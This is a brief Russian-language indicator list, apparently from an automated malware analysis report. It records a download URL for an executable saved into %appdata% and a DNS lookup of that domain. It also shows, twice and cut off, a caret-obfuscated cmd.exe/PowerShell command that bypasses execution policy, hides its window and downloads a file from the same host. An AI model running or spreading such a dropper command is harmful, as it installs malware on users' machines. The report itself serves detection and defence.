Техническая информация
- https://dirovaka.co/nexis.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^W^eRsh^elL.^E^X^E -Exe^Cutio^NP^OL^I^cY^ b^Y^P^asS ^-n^OpROfI^le ^-^W^InD^oW^STY^lE Hid^dEN (NE^W-^Ob^j^ECt^ sy^steM.neT^.^weBCLi^E^N^t).D^O^W^nL^oa^Df^I^Le(^'https://dirov...
- DNS ASK di##vaka.co
- '<SYSTEM32>\cmd.exe' /c "Po^W^eRsh^elL.^E^X^E -Exe^Cutio^NP^OL^I^cY^ b^Y^P^asS ^-n^OpROfI^le ^-^W^InD^oW^STY^lE Hid^dEN (NE^W-^Ob^j^ECt^ sy^steM.neT^.^weBCLi^E^N^t).D^O^W^nL^oa^Df^I^Le(^'https://dirov...' (со скрытым окном)